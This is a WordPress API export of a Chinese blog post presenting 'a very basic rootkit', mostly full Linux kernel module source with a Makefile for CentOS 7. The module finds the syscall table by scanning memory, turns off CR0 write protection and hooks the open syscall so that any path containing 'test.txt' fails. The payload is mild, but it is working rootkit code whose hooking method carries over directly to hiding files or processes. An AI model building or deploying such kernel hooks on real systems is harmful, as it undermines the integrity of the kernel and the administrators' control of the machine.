\u7f16\u8bd1\u7cfb\u7edf:\nCentOS 7\n\nuname -r\n3.10.0-957.21.3-el7.x86_64\n<\/code><\/pre>\n#include <linux\/module.h>\n#include <linux\/syscalls.h>\n#include <net\/inet_sock.h>\n\nasmlinkage long(*real_open)(const char __user *filename, int flags, unsigned short mode);\n\nunsigned long **syscall_table = NULL; \nchar buf[1024] = { 0 };\n\nunsigned long get_syscall_table(void)\n{\n unsigned long ptr = 0;\n unsigned long *p = NULL;\n for (ptr = (unsigned long)sys_close;\n ptr < (unsigned long)&loops_per_jiffy;\n ptr += sizeof(void*))\n {\n p = (unsigned long*)ptr;\n if (p[__NR_close] == (unsigned long*)sys_close)\n {\n return (unsigned long)p;\n }\n }\n return NULL;\n}\n\nvoid disable_wp()\n{\n unsigned long cr0 = read_cr0();\n clear_bit(16, &cr0);\n write_cr0(cr0);\n}\n\nvoid enable_wp()\n{\n unsigned long cr0 = read_cr0();\n set_bit(16, &cr0);\n write_cr0(cr0);\n}\n\nasmlinkage long fake_open(const char __user *filename, int flags, unsigned short mode)\n{\n int len = strnlen_user(filename, sizeof(buf));\n long ret = copy_from_user(buf, filename,len); \n\n \/\/\u7981\u6b62\u8bbf\u95ee\u6307\u5b9a\u6587\u4ef6\n if (ret == 0 && strstr(buf, \"test.txt\") != NULL)\n {\n return -1;\n }\n\n return (*real_open)(filename, flags, mode);\n}\n\nstatic int rootkit_init(void)\n{\n printk(\"driver start..\\n\");\n\n syscall_table = (unsigned long**)get_syscall_table();\n printk(\"syscall_table:%llx\\n\", syscall_table); \n\n if (syscall_table == NULL)\n {\n return 0;\n }\n\n disable_wp();\n real_open = (void *)syscall_table[__NR_open];\n syscall_table[__NR_open] = (unsigned long)fake_open; \n enable_wp();\n\n return 0;\n}\nstatic void rootkit_exit(void)\n{\n printk(\"driver exit..\\n\");\n if (syscall_table == NULL)\n {\n return;\n }\n\n disable_wp();\n syscall_table[__NR_open] = (unsigned long)real_open; \n enable_wp();\n\n return;\n}\n\nmodule_init(rootkit_init);\nmodule_exit(rootkit_exit);\n\nMODULE_LICENSE(\"GPL\");\n<\/code><\/pre>\nMakefile:<\/p>\n
obj-m = rootkit.o\n\nK_DIR = $(shell uname -r)\nPWD = $(shell pwd)\n\nall:\n make -C \/lib\/modules\/$(K_DIR)\/build M=$(PWD) modules\nclean:\n make -C \/lib\/modules\/$(K_DIR)\/build M=$(PWD) clean \n\n<\/code><\/pre>\n\u5b9e\u73b0\u6548\u679c:
\n![\"image\"](\"http:\/\/pic.sinkland.cn\/rootkit.png\")
<\/p>\n","protected":false},"excerpt":{"rendered":"
\u4e00\u4e2a\u975e\u5e38\u57fa\u7840\u7684rootkit\uff0c\u7981\u6b62\u8bfb\u53d6\u6307\u5b9a\u6587\u4ef6 \u7f16\u8bd1\u7cfb\u7edf: CentOS 7 uname -r 3.10.0- […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"_links":{"self":[{"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/posts\/217"}],"collection":[{"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=217"}],"version-history":[{"count":1,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/posts\/217\/revisions"}],"predecessor-version":[{"id":218,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/posts\/217\/revisions\/218"}],"wp:attachment":[{"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=217"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=217"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=217"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}